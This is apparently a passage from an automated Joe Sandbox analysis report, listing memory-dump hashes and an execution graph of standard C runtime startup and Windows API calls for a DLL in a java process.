                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 291a20e96f5f00b88945569c4f83d94062b1b24144fb9828c5b4d4b57fb18643
                                                                                                                                                                                                                                    • Instruction ID: 234356e5fdf6ba86dd51175307b37eecf47ddbe951a3d8c5bda6f845ef22f407
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 291a20e96f5f00b88945569c4f83d94062b1b24144fb9828c5b4d4b57fb18643
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F0C2B6D00A06ABDB248F61C5047CAFBB4BB48714F15421AC52C63310D3787469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 02DF03C0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
                                                                                                                                                                                                                                    • Instruction ID: ffe4de0fc5eda680b586667af1c7fc2c46d638e141dfcff91efd692403c28b0e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 352117BA5042568FDB758F188C403D9B7E6FB48314F22882EDEC9E7711D330AA89CB54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                                                                                                                    Total number of Nodes:695
                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                    execution_graph 12999 73a91638 13000 73a91648 12999->13000 13001 73a91643 12999->13001 13005 73a91542 13000->13005 13013 73a93dfc 13001->13013 13004 73a91656 13006 73a9154e ___DllMainCRTStartup 13005->13006 13010 73a9159b ___DllMainCRTStartup 13006->13010 13011 73a915eb ___DllMainCRTStartup 13006->13011 13017 73a913de 13006->13017 13008 73a915cb 13009 73a913de __CRT_INIT@12 149 API calls 13008->13009 13008->13011 13009->13011 13010->13008 13010->13011 13012 73a913de __CRT_INIT@12 149 API calls 13010->13012 13011->13004 13012->13008 13014 73a93e2e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 13013->13014 13015 73a93e21 13013->13015 13016 73a93e25 13014->13016 13015->13014 13015->13016 13016->13000 13018 73a913ea ___DllMainCRTStartup 13017->13018 13019 73a9146c 13018->13019 13020 73a913f2 13018->13020 13022 73a914cd 13019->13022 13023 73a91472 13019->13023 13069 73a917ec HeapCreate 13020->13069 13024 73a9152b 13022->13024 13025 73a914d2 13022->13025 13029 73a91490 13023->13029 13036 73a913fb ___DllMainCRTStartup 13023->13036 13170 73a91ab7 13023->13170 13024->13036 13205 73a93318 13024->13205 13178 73a93031 TlsGetValue 13025->13178 13026 73a913f7 13028 73a91402 13026->13028 13026->13036 13070 73a93386 GetModuleHandleW 13028->13070 13034 73a914a4 13029->13034 13039 73a93825 __ioterm 67 API calls 13029->13039 13174 73a914b7 13034->13174 13036->13010 13038 73a91407 __RTC_Initialize 13046 73a91417 GetCommandLineA 13038->13046 13062 73a9140b 13038->13062 13041 73a9149a 13039->13041 13042 73a93065 __mtterm 70 API calls 13041->13042 13045 73a9149f 13042->13045 13043 73a914ef DecodePointer 13049 73a91504 13043->13049 13173 73a9180a HeapDestroy 13045->13173 13096 73a93ba9 GetEnvironmentStringsW 13046->13096 13051 73a91508 13049->13051 13052 73a9151f 13049->13052 13186 73a930a2 13051->13186 13199 73a91253 13052->13199 13056 73a9150f GetCurrentThreadId 13056->13036 13057 73a91410 13057->13036 13059 73a91435 13122 73a93065 13059->13122 13095 73a9180a HeapDestroy 13062->13095 13064 73a91455 13064->13057 13165 73a93825 13064->13165 13069->13026 13071 73a9339a 13070->13071 13072 73a933a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13070->13072 13073 73a93065 __mtterm 70 API calls 13071->13073 13074 73a933ed TlsAlloc 13072->13074 13075 73a9339f 13073->13075 13077 73a9343b TlsSetValue 13074->13077 13078 73a934fc 13074->13078 13075->13038 13077->13078 13079 73a9344c 13077->13079 13078->13038 13216 73a91873 13079->13216 13084 73a93494 DecodePointer 13087 73a934a9 13084->13087 13085 73a934f7 13086 73a93065 __mtterm 70 API calls 13085->13086 13086->13078 13087->13085 13088 73a93546 __calloc_crt 66 API calls 13087->13088 13089 73a934bf 13088->13089 13089->13085 13090 73a934c7 DecodePointer 13089->13090 13091 73a934d8 13090->13091 13091->13085 13092 73a934dc 13091->13092 13093 73a930a2 __getptd_noexit 66 API calls 13092->13093 13094 73a934e4 GetCurrentThreadId 13093->13094 13094->13078 13095->13057 13097 73a91427 13096->13097 13098 73a93bc5 WideCharToMultiByte 13096->13098 13109 73a935e0 GetStartupInfoW 13097->13109 13100 73a93bfa 13098->13100 13101 73a93c32 FreeEnvironmentStringsW 13098->13101 13227 73a93501 13100->13227 13101->13097 13104 73a93c08 WideCharToMultiByte 13105 73a93c1a 13104->13105 13106 73a93c26 FreeEnvironmentStringsW 13104->13106 13107 73a91253 _free 66 API calls 13105->13107 13106->13097 13108 73a93c22 13107->13108 13108->13106 13110 73a93546 __calloc_crt 66 API calls 13109->13110 13119 73a935fe 13110->13119 13111 73a93773 13113 73a937a9 GetStdHandle 13111->13113 13115 73a9380d SetHandleCount 13111->13115 13116 73a937bb GetFileType 13111->13116 13120 73a937e1 InitializeCriticalSectionAndSpinCount 13111->13120 13112 73a936f3 13112->13111 13117 73a9372a InitializeCriticalSectionAndSpinCount 13112->13117 13118 73a9371f GetFileType 13112->13118 13113->13111 13114 73a93546 __calloc_crt 66 API calls 13114->13119 13121 73a91431 13115->13121 13116->13111 13117->13112 13117->13121 13118->13112 13118->13117 13119->13111 13119->13112 13119->13114 13119->13121 13120->13111 13120->13121 13121->13059 13132 73a93aee 13121->13132 13123 73a9306f DecodePointer 13122->13123 13124 73a9307e 13122->13124 13123->13124 13125 73a9309d 13124->13125 13126 73a9308f TlsFree 13124->13126 13127 73a93f05 DeleteCriticalSection 13125->13127 13129 73a93f1d 13125->13129 13126->13125 13128 73a91253 _free 66 API calls 13127->13128 13128->13125 13130 73a93f2f DeleteCriticalSection 13129->13130 13131 73a93f3d 13129->13131 13130->13129 13131->13062 13133 73a93b08 GetModuleFileNameA 13132->13133 13134 73a93b03 13132->13134 13136 73a93b2f 13133->13136 13369 73a952d7 13134->13369 13373 73a93954 13136->13373 13139 73a93501 __malloc_crt 66 API calls 13140 73a93b71 13139->13140 13141 73a93954 _parse_cmdline 76 API calls 13140->13141 13142 73a91441 13140->13142 13141->13142 13142->13064 13143 73a93878 13142->13143 13144 73a93881 13143->13144 13146 73a93886 _strlen 13143->13146 13145 73a952d7 ___initmbctable 94 API calls 13144->13145 13145->13146 13147 73a93546 __calloc_crt 66 API calls 13146->13147 13150 73a9144a 13146->13150 13152 73a938bb _strlen 13147->13152 13148 73a9390a 13149 73a91253 _free 66 API calls 13148->13149 13149->13150 13150->13064 13159 73a918ca 13150->13159 13151 73a93546 __calloc_crt 66 API calls 13151->13152 13152->13148 13152->13150 13152->13151 13153 73a93930 13152->13153 13156 73a93947 13152->13156 13689 73a95cf1 13152->13689 13154 73a91253 _free 66 API calls 13153->13154 13154->13150 13157 73a92dc0 __invoke_watson 10 API calls 13156->13157 13158 73a93953 13157->13158 13160 73a918d8 __IsNonwritableInCurrentImage 13159->13160 13698 73a943f3 13160->13698 13162 73a918f6 __initterm_e 13164 73a91917 __IsNonwritableInCurrentImage 13162->13164 13701 73a943dc 13162->13701 13164->13064 13169 73a9382e 13165->13169 13166 73a93875 13166->13059 13167 73a91253 _free 66 API calls 13167->13169 13168 73a93847 DeleteCriticalSection 13168->13169 13169->13166 13169->13167 13169->13168 13171 73a91961 _doexit 66 API calls 13170->13171 13172 73a91ac2 13171->13172 13172->13029 13173->13034 13175 73a914ca 13174->13175 13176 73a914bc 13174->13176 13175->13036 13176->13175 13177 73a93065 __mtterm 70 API calls 13176->13177 13177->13175 13179 73a914d7 13178->13179 13180 73a93046 DecodePointer TlsSetValue 13178->13180 13181 73a93546 13179->13181 13180->13179 13184 73a9354f 13181->13184 13183 73a914e3 13183->13036 13183->13043 13184->13183 13185 73a9356d Sleep 13184->13185 13766 73a95bc2 13184->13766 13185->13184 13775 73a92e30 13186->13775 13188 73a930ae GetModuleHandleW 13189 73a94019 __lock 64 API calls 13188->13189 13190 73a930ec InterlockedIncrement 13189->13190 13776 73a93144 13190->13776 13193 73a94019 __lock 64 API calls 13194 73a9310d 13193->13194 13195 73a952f5 ___addlocaleref 8 API calls 13194->13195 13196 73a9312b 13195->13196 13779 73a9314d 13196->13779 13198 73a93138 ___DllMainCRTStartup 13198->13056 13200 73a91287 _free 13199->13200 13201 73a9125e HeapFree 13199->13201 13200->13057 13201->13200 13202 73a91273 13201->13202 13203 73a917a3 __fclose_nolock 64 API calls 13202->13203 13204 73a91279 GetLastError 13203->13204 13204->13200 13206 73a93371 13205->13206 13207 73a93326 13205->13207 13208 73a9337b TlsSetValue 13206->13208 13209 73a93384 13206->13209 13210 73a9332c TlsGetValue 13207->13210 13211 73a93353 DecodePointer 13207->13211 13208->13209 13209->13036 13212 73a9333f TlsGetValue 13210->13212 13213 73a9334f 13210->13213 13214 73a93369 13211->13214 13212->13213 13213->13211 13784 73a931e9 13214->13784 13225 73a9301f EncodePointer 13216->13225 13218 73a9187b __init_pointers __initp_misc_winsig 13226 73a94085 EncodePointer 13218->13226 13220 73a918a1 EncodePointer EncodePointer EncodePointer EncodePointer 13221 73a93e9f 13220->13221 13222 73a93eaa 13221->13222 13223 73a93eb4 InitializeCriticalSectionAndSpinCount 13222->13223 13224 73a93490 13222->13224 13223->13222 13223->13224 13224->13084 13224->13085 13225->13218 13226->13220 13231 73a9350a 13227->13231 13229 73a93540 13229->13101 13229->13104 13230 73a93521 Sleep 13230->13231 13231->13229 13231->13230 13232 73a9128d 13231->13232 13233 73a9130a 13232->13233 13239 73a9129b 13232->13239 13234 73a91d01 _malloc DecodePointer 13233->13234 13235 73a91310 13234->13235 13236 73a917a3 __fclose_nolock 65 API calls 13235->13236 13247 73a91302 13236->13247 13238 73a912c9 HeapAlloc 13238->13239 13238->13247 13239->13238 13241 73a912f6 13239->13241 13245 73a912f4 13239->13245 13248 73a91cb9 13239->13248 13257 73a91b0a 13239->13257 13281 73a91849 13239->13281 13284 73a91d01 DecodePointer 13239->13284 13286 73a917a3 13241->13286 13246 73a917a3 __fclose_nolock 65 API calls 13245->13246 13246->13247 13247->13231 13289 73a94927 13248->13289 13250 73a91cc0 13251 73a94927 __NMSG_WRITE 66 API calls 13250->13251 13255 73a91ccd 13250->13255 13251->13255 13252 73a91b0a __NMSG_WRITE 66 API calls 13253 73a91ce5 13252->13253 13256 73a91b0a __NMSG_WRITE 66 API calls 13253->13256 13254 73a91cef 13254->13239 13255->13252 13255->13254 13256->13254 13258 73a91b2b __NMSG_WRITE 13257->13258 13260 73a94927 __NMSG_WRITE 63 API calls 13258->13260 13280 73a91c47 13258->13280 13262 73a91b45 13260->13262 13261 73a91cb7 13261->13239 13263 73a91c56 GetStdHandle 13262->13263 13264 73a94927 __NMSG_WRITE 63 API calls 13262->13264 13266 73a91c64 _strlen 13263->13266 13263->13280 13265 73a91b56 13264->13265 13265->13263 13267 73a91b68 13265->13267 13270 73a91c9a WriteFile 13266->13270 13266->13280 13267->13280 13308 73a948c4 13267->13308 13270->13280 13271 73a91b94 GetModuleFileNameW 13272 73a91bb5 13271->13272 13276 73a91bc1 _wcslen 13271->13276 13273 73a948c4 __NMSG_WRITE 63 API calls 13272->13273 13273->13276 13274 73a92dc0 __invoke_watson 10 API calls 13274->13276 13275 73a94767 63 API calls __NMSG_WRITE 13275->13276 13276->13274 13276->13275 13278 73a91c37 13276->13278 13315 73a947dc 13276->13315 13324 73a945fb 13278->13324 13342 73a91244 13280->13342 13352 73a9181e GetModuleHandleW 13281->13352 13285 73a91d16 13284->13285 13285->13239 13355 73a93156 GetLastError 13286->13355 13288 73a917a8 13288->13245 13290 73a94933 13289->13290 13291 73a9493d 13290->13291 13292 73a917a3 __fclose_nolock 66 API calls 13290->13292 13291->13250 13293 73a94956 13292->13293 13296 73a92e12 13293->13296 13299 73a92de5 DecodePointer 13296->13299 13300 73a92dfa 13299->13300 13305 73a92dc0 13300->13305 13302 73a92e11 13303 73a92de5 __fclose_nolock 10 API calls 13302->13303 13304 73a92e1e 13303->13304 13304->13250 13306 73a92c97 __call_reportfault 8 API calls 13305->13306 13307 73a92dd2 GetCurrentProcess TerminateProcess 13306->13307 13307->13302 13309 73a948d2 13308->13309 13310 73a948ee 13309->13310 13311 73a917a3 __fclose_nolock 66 API calls 13309->13311 13312 73a948de 13311->13312 13313 73a92e12 __fclose_nolock 11 API calls 13312->13313 13314 73a91b89 13313->13314 13314->13271 13314->13276 13320 73a947ee 13315->13320 13316 73a947f2 13317 73a917a3 __fclose_nolock 66 API calls 13316->13317 13318 73a947f7 13316->13318 13319 73a9480e 13317->13319 13318->13276 13321 73a92e12 __fclose_nolock 11 API calls 13319->13321 13320->13316 13320->13318 13322 73a94835 13320->13322 13321->13318 13322->13318 13323 73a917a3 __fclose_nolock 66 API calls 13322->13323 13323->13319 13350 73a9301f EncodePointer 13324->13350 13326 73a94621 13327 73a946ae 13326->13327 13328 73a94631 LoadLibraryW 13326->13328 13330 73a946c8 DecodePointer DecodePointer 13327->13330 13340 73a946db 13327->13340 13329 73a94646 GetProcAddress 13328->13329 13334 73a94746 13328->13334 13333 73a9465c 7 API calls 13329->13333 13329->13334 13330->13340 13331 73a9473a DecodePointer 13331->13334 13332 73a94711 DecodePointer 13332->13331 13336 73a94718 13332->13336 13333->13327 13337 73a9469e GetProcAddress EncodePointer 13333->13337 13335 73a91244 ___crtMessageBoxW 5 API calls 13334->13335 13338 73a94765 13335->13338 13336->13331 13339 73a9472b DecodePointer 13336->13339 13337->13327 13338->13280 13339->13331 13341 73a946fe 13339->13341 13340->13331 13340->13332 13340->13341 13341->13331 13343 73a9124c 13342->13343 13344 73a9124e IsDebuggerPresent 13342->13344 13343->13261 13351 73a93e97 13344->13351 13347 73a91728 SetUnhandledExceptionFilter UnhandledExceptionFilter 13348 73a9174d GetCurrentProcess TerminateProcess 13347->13348 13349 73a91745 __call_reportfault 13347->13349 13348->13261 13349->13348 13350->13326 13351->13347 13353 73a91832 GetProcAddress 13352->13353 13354 73a91842 ExitProcess 13352->13354 13353->13354 13356 73a93031 ___set_flsgetvalue 3 API calls 13355->13356 13357 73a9316d 13356->13357 13358 73a931c3 SetLastError 13357->13358 13359 73a93546 __calloc_crt 62 API calls 13357->13359 13358->13288 13360 73a93181 13359->13360 13360->13358 13361 73a93189 DecodePointer 13360->13361 13362 73a9319e 13361->13362 13363 73a931ba 13362->13363 13364 73a931a2 13362->13364 13366 73a91253 _free 62 API calls 13363->13366 13365 73a930a2 __getptd_noexit 62 API calls 13364->13365 13367 73a931aa GetCurrentThreadId 13365->13367 13368 73a931c0 13366->13368 13367->13358 13368->13358 13370 73a952e0 13369->13370 13371 73a952e7 13369->13371 13379 73a9513d 13370->13379 13371->13133 13375 73a93973 13373->13375 13377 73a939e0 13375->13377 13683 73a95da3 13375->13683 13376 73a93ade 13376->13139 13376->13142 13377->13376 13378 73a95da3 76 API calls _parse_cmdline 13377->13378 13378->13377 13380 73a95149 ___DllMainCRTStartup 13379->13380 13410 73a931cf 13380->13410 13384 73a9515c 13431 73a94ed8 13384->13431 13387 73a93501 __malloc_crt 66 API calls 13388 73a9517d 13387->13388 13389 73a9529c ___DllMainCRTStartup 13388->13389 13438 73a94f54 13388->13438 13389->13371 13392 73a952a9 13392->13389 13398 73a91253 _free 66 API calls 13392->13398 13402 73a952bc 13392->13402 13393 73a951ad InterlockedDecrement 13394 73a951bd 13393->13394 13395 73a951ce InterlockedIncrement 13393->13395 13394->13395 13397 73a91253 _free 66 API calls 13394->13397 13395->13389 13396 73a951e4 13395->13396 13396->13389 13448 73a94019 13396->13448 13400 73a951cd 13397->13400 13398->13402 13399 73a917a3 __fclose_nolock 66 API calls 13399->13389 13400->13395 13402->13399 13404 73a951f8 InterlockedDecrement 13405 73a95274 13404->13405 13406 73a95287 InterlockedIncrement 13404->13406 13405->13406 13408 73a91253 _free 66 API calls 13405->13408 13455 73a9529e 13406->13455 13409 73a95286 13408->13409 13409->13406 13411 73a93156 __getptd_noexit 66 API calls 13410->13411 13412 73a931d7 13411->13412 13413 73a931e4 13412->13413 13458 73a91ac6 13412->13458 13415 73a94e34 13413->13415 13416 73a94e40 ___DllMainCRTStartup 13415->13416 13417 73a931cf __getptd 66 API calls 13416->13417 13418 73a94e45 13417->13418 13419 73a94e57 13418->13419 13420 73a94019 __lock 66 API calls 13418->13420 13422 73a94e65 ___DllMainCRTStartup 13419->13422 13424 73a91ac6 __amsg_exit 66 API calls 13419->13424 13421 73a94e75 13420->13421 13423 73a94ebe 13421->13423 13426 73a94e8c InterlockedDecrement 13421->13426 13427 73a94ea6 InterlockedIncrement 13421->13427 13422->13384 13497 73a94ecf 13423->13497 13424->13422 13426->13427 13428 73a94e97 13426->13428 13427->13423 13428->13427 13429 73a91253 _free 66 API calls 13428->13429 13430 73a94ea5 13429->13430 13430->13427 13501 73a91fae 13431->13501 13434 73a94f15 13436 73a94f1a GetACP 13434->13436 13437 73a94f07 13434->13437 13435 73a94ef7 GetOEMCP 13435->13437 13436->13437 13437->13387 13437->13389 13439 73a94ed8 getSystemCP 78 API calls 13438->13439 13440 73a94f74 13439->13440 13441 73a94f7f setSBCS 13440->13441 13443 73a94fc3 IsValidCodePage 13440->13443 13447 73a94fe8 _memset __setmbcp_nolock 13440->13447 13442 73a91244 ___crtMessageBoxW 5 API calls 13441->13442 13444 73a9513b 13442->13444 13443->13441 13445 73a94fd5 GetCPInfo 13443->13445 13444->13392 13444->13393 13445->13441 13445->13447 13592 73a94ca4 GetCPInfo 13447->13592 13449 73a9402e 13448->13449 13450 73a94041 EnterCriticalSection 13448->13450 13653 73a93f57 13449->13653 13450->13404 13452 73a94034 13452->13450 13453 73a91ac6 __amsg_exit 65 API calls 13452->13453 13454 73a94040 13453->13454 13454->13450 13682 73a93f40 LeaveCriticalSection 13455->13682 13457 73a952a5 13457->13389 13459 73a91cb9 __FF_MSGBANNER 66 API calls 13458->13459 13460 73a91ad0 13459->13460 13461 73a91b0a __NMSG_WRITE 66 API calls 13460->13461 13462 73a91ad8 13461->13462 13465 73a91aa1 13462->13465 13468 73a91961 13465->13468 13467 73a91ab2 13469 73a9196d ___DllMainCRTStartup 13468->13469 13470 73a94019 __lock 61 API calls 13469->13470 13471 73a91974 13470->13471 13473 73a9199f DecodePointer 13471->13473 13480 73a91a1e 13471->13480 13475 73a919b6 DecodePointer 13473->13475 13473->13480 13487 73a919c9 13475->13487 13476 73a91a9b ___DllMainCRTStartup 13476->13467 13479 73a91a83 13481 73a91a8c 13479->13481 13482 73a91849 _doexit 3 API calls 13479->13482 13491 73a91a8c 13480->13491 13483 73a91a99 13481->13483 13496 73a93f40 LeaveCriticalSection 13481->13496 13482->13481 13483->13467 13484 73a919e0 DecodePointer 13490 73a9301f EncodePointer 13484->13490 13487->13480 13487->13484 13488 73a919ef DecodePointer DecodePointer 13487->13488 13489 73a9301f EncodePointer 13487->13489 13488->13487 13489->13487 13490->13487 13492 73a91a6c 13491->13492 13493 73a91a92 13491->13493 13492->13476 13495 73a93f40 LeaveCriticalSection 13492->13495 13494 73a93f40 _doexit LeaveCriticalSection 13493->13494 13494->13492 13495->13479 13496->13483 13500 73a93f40 LeaveCriticalSection 13497->13500 13499 73a94ed6 13499->13419 13500->13499 13502 73a91fc1 13501->13502 13508 73a9200e 13501->13508 13503 73a931cf __getptd 66 API calls 13502->13503 13504 73a91fc6 13503->13504 13505 73a91fee 13504->13505 13509 73a955b5 13504->13509 13507 73a94e34 __setmbcp 68 API calls 13505->13507 13505->13508 13507->13508 13508->13434 13508->13435 13510 73a955c1 ___DllMainCRTStartup 13509->13510 13511 73a931cf __getptd 66 API calls 13510->13511 13512 73a955c6 13511->13512 13513 73a955f4 13512->13513 13515 73a955d8 13512->13515 13514 73a94019 __lock 66 API calls 13513->13514 13516 73a955fb 13514->13516 13517 73a931cf __getptd 66 API calls 13515->13517 13524 73a95568 13516->13524 13519 73a955dd 13517->13519 13521 73a955eb ___DllMainCRTStartup 13519->13521 13523 73a91ac6 __amsg_exit 66 API calls 13519->13523 13521->13505 13523->13521 13525 73a95575 13524->13525 13526 73a955aa 13524->13526 13525->13526 13535 73a952f5 InterlockedIncrement 13525->13535 13532 73a95622 13526->13532 13528 73a9558b 13528->13526 13547 73a95384 13528->13547 13591 73a93f40 LeaveCriticalSection 13532->13591 13534 73a95629 13534->13519 13536 73a95313 InterlockedIncrement 13535->13536 13537 73a95316 13535->13537 13536->13537 13538 73a95320 InterlockedIncrement 13537->13538 13539 73a95323 13537->13539 13538->13539 13540 73a9532d InterlockedIncrement 13539->13540 13541 73a95330 13539->13541 13540->13541 13542 73a9533a InterlockedIncrement 13541->13542 13543 73a9533d 13541->13543 13542->13543 13544 73a95356 InterlockedIncrement 13543->13544 13545 73a95366 InterlockedIncrement 13543->13545 13546 73a95371 InterlockedIncrement 13543->13546 13544->13543 13545->13543 13546->13528 13548 73a95418 13547->13548 13549 73a95395 InterlockedDecrement 13547->13549 13548->13526 13561 73a9541d 13548->13561 13550 73a953aa InterlockedDecrement 13549->13550 13551 73a953ad 13549->13551 13550->13551 13552 73a953ba 13551->13552 13553 73a953b7 InterlockedDecrement 13551->13553 13554 73a953c4 InterlockedDecrement 13552->13554 13555 73a953c7 13552->13555 13553->13552 13554->13555 13556 73a953d1 InterlockedDecrement 13555->13556 13558 73a953d4 13555->13558 13556->13558 13557 73a953ed InterlockedDecrement 13557->13558 13558->13557 13559 73a953fd InterlockedDecrement 13558->13559 13560 73a95408 InterlockedDecrement 13558->13560 13559->13558 13560->13548 13562 73a95434 13561->13562 13563 73a954a1 13561->13563 13562->13563 13567 73a95468 13562->13567 13575 73a91253 _free 66 API calls 13562->13575 13564 73a91253 _free 66 API calls 13563->13564 13565 73a954ee 13563->13565 13566 73a954c2 13564->13566 13568 73a96e9c ___free_lc_time 66 API calls 13565->13568 13579 73a95517 13565->13579 13569 73a91253 _free 66 API calls 13566->13569 13570 73a95489 13567->13570 13578 73a91253 _free 66 API calls 13567->13578 13571 73a9550c 13568->13571 13572 73a954d5 13569->13572 13573 73a91253 _free 66 API calls 13570->13573 13576 73a91253 _free 66 API calls 13571->13576 13577 73a91253 _free 66 API calls 13572->13577 13580 73a95496 13573->13580 13574 73a9555c 13581 73a91253 _free 66 API calls 13574->13581 13582 73a9545d 13575->13582 13576->13579 13585 73a954e3 13577->13585 13586 73a9547e 13578->13586 13579->13574 13587 73a91253 66 API calls _free 13579->13587 13588 73a91253 _free 66 API calls 13580->13588 13583 73a95562 13581->13583 13584 73a9727c ___free_lconv_mon 66 API calls 13582->13584 13583->13526 13584->13567 13589 73a91253 _free 66 API calls 13585->13589 13590 73a97213 ___free_lconv_num 66 API calls 13586->13590 13587->13579 13588->13563 13589->13565 13590->13570 13591->13534 13593 73a94d8c 13592->13593 13595 73a94cd8 _memset 13592->13595 13598 73a91244 ___crtMessageBoxW 5 API calls 13593->13598 13602 73a96e5c 13595->13602 13600 73a94e32 13598->13600 13600->13447 13601 73a96d2f ___crtLCMapStringA 82 API calls 13601->13593 13603 73a91fae _LocaleUpdate::_LocaleUpdate 76 API calls 13602->13603 13604 73a96e6f 13603->13604 13612 73a96d75 13604->13612 13607 73a96d2f 13608 73a91fae _LocaleUpdate::_LocaleUpdate 76 API calls 13607->13608 13609 73a96d42 13608->13609 13629 73a96b48 13609->13629 13613 73a96d9e MultiByteToWideChar 13612->13613 13614 73a96d93 13612->13614 13618 73a96dcb 13613->13618 13624 73a96dc7 13613->13624 13614->13613 13615 73a96de0 _memset __crtLCMapStringA_stat 13620 73a96e19 MultiByteToWideChar 13615->13620 13615->13624 13616 73a91244 ___crtMessageBoxW 5 API calls 13617 73a94d47 13616->13617 13617->13607 13618->13615 13619 73a9128d _malloc 66 API calls 13618->13619 13619->13615 13621 73a96e2f GetStringTypeW 13620->13621 13622 73a96e40 13620->13622 13621->13622 13625 73a96161 13622->13625 13624->13616 13626 73a9616d 13625->13626 13628 73a9617e 13625->13628 13627 73a91253 _free 66 API calls 13626->13627 13626->13628 13627->13628 13628->13624 13630 73a96b66 MultiByteToWideChar 13629->13630 13632 73a96bc4 13630->13632 13636 73a96bcb 13630->13636 13633 73a91244 ___crtMessageBoxW 5 API calls 13632->13633 13635 73a94d67 13633->13635 13634 73a96c18 MultiByteToWideChar 13638 73a96c31 LCMapStringW 13634->13638 13652 73a96d10 13634->13652 13635->13601 13637 73a9128d _malloc 66 API calls 13636->13637 13641 73a96be4 __crtLCMapStringA_stat 13636->13641 13637->13641 13640 73a96c50 13638->13640 13638->13652 13639 73a96161 __freea 66 API calls 13639->13632 13642 73a96c5a 13640->13642 13645 73a96c83 13640->13645 13641->13632 13641->13634 13644 73a96c6e LCMapStringW 13642->13644 13642->13652 13643 73a96c9e __crtLCMapStringA_stat 13646 73a96cd2 LCMapStringW 13643->13646 13643->13652 13644->13652 13645->13643 13649 73a9128d _malloc 66 API calls 13645->13649 13647 73a96ce8 WideCharToMultiByte 13646->13647 13648 73a96d0a 13646->13648 13647->13648 13650 73a96161 __freea 66 API calls 13648->13650 13649->13643 13650->13652 13652->13639 13654 73a93f63 ___DllMainCRTStartup 13653->13654 13655 73a91cb9 __FF_MSGBANNER 65 API calls 13654->13655 13666 73a93f89 13654->13666 13656 73a93f78 13655->13656 13658 73a91b0a __NMSG_WRITE 65 API calls 13656->13658 13657 73a93501 __malloc_crt 65 API calls 13659 73a93fa4 13657->13659 13660 73a93f7f 13658->13660 13661 73a93fab 13659->13661 13662 73a93fba 13659->13662 13663 73a91849 _doexit 3 API calls 13660->13663 13664 73a917a3 __fclose_nolock 65 API calls 13661->13664 13665 73a94019 __lock 65 API calls 13662->13665 13663->13666 13667 73a93f99 ___DllMainCRTStartup 13664->13667 13668 73a93fc1 13665->13668 13666->13657 13666->13667 13667->13452 13669 73a93fc9 InitializeCriticalSectionAndSpinCount 13668->13669 13670 73a93ff4 13668->13670 13671 73a93fd9 13669->13671 13672 73a93fe5 13669->13672 13673 73a91253 _free 65 API calls 13670->13673 13674 73a91253 _free 65 API calls 13671->13674 13678 73a94010 13672->13678 13673->13672 13675 73a93fdf 13674->13675 13677 73a917a3 __fclose_nolock 65 API calls 13675->13677 13677->13672 13681 73a93f40 LeaveCriticalSection 13678->13681 13680 73a94017 13680->13667 13681->13680 13682->13457 13686 73a95d50 13683->13686 13687 73a91fae _LocaleUpdate::_LocaleUpdate 76 API calls 13686->13687 13688 73a95d63 13687->13688 13688->13375 13690 73a95cff 13689->13690 13691 73a95d06 13689->13691 13690->13691 13696 73a95d24 13690->13696 13692 73a917a3 __fclose_nolock 66 API calls 13691->13692 13693 73a95d0b 13692->13693 13694 73a92e12 __fclose_nolock 11 API calls 13693->13694 13695 73a95d15 13694->13695 13695->13152 13696->13695 13697 73a917a3 __fclose_nolock 66 API calls 13696->13697 13697->13693 13699 73a943f9 EncodePointer 13698->13699 13699->13699 13700 73a94413 13699->13700 13700->13162 13704 73a943a0 13701->13704 13703 73a943e9 13703->13164 13705 73a943ac ___DllMainCRTStartup 13704->13705 13712 73a91861 13705->13712 13711 73a943cd ___DllMainCRTStartup 13711->13703 13713 73a94019 __lock 66 API calls 13712->13713 13714 73a91868 13713->13714 13715 73a942b9 DecodePointer DecodePointer 13714->13715 13716 73a94368 13715->13716 13717 73a942e7 13715->13717 13726 73a943d6 13716->13726 13717->13716 13729 73a96181 13717->13729 13719 73a9434b EncodePointer EncodePointer 13719->13716 13720 73a942f9 13720->13719 13721 73a9431d 13720->13721 13736 73a93592 13720->13736 13721->13716 13723 73a93592 __realloc_crt 70 API calls 13721->13723 13724 73a94339 EncodePointer 13721->13724 13725 73a94333 13723->13725 13724->13719 13725->13716 13725->13724 13762 73a9186a 13726->13762 13730 73a9618c 13729->13730 13731 73a961a1 HeapSize 13729->13731 13732 73a917a3 __fclose_nolock 66 API calls 13730->13732 13731->13720 13733 73a96191 13732->13733 13734 73a92e12 __fclose_nolock 11 API calls 13733->13734 13735 73a9619c 13734->13735 13735->13720 13739 73a9359b 13736->13739 13738 73a935da 13738->13721 13739->13738 13740 73a935bb Sleep 13739->13740 13741 73a95c44 13739->13741 13740->13739 13742 73a95c5a 13741->13742 13743 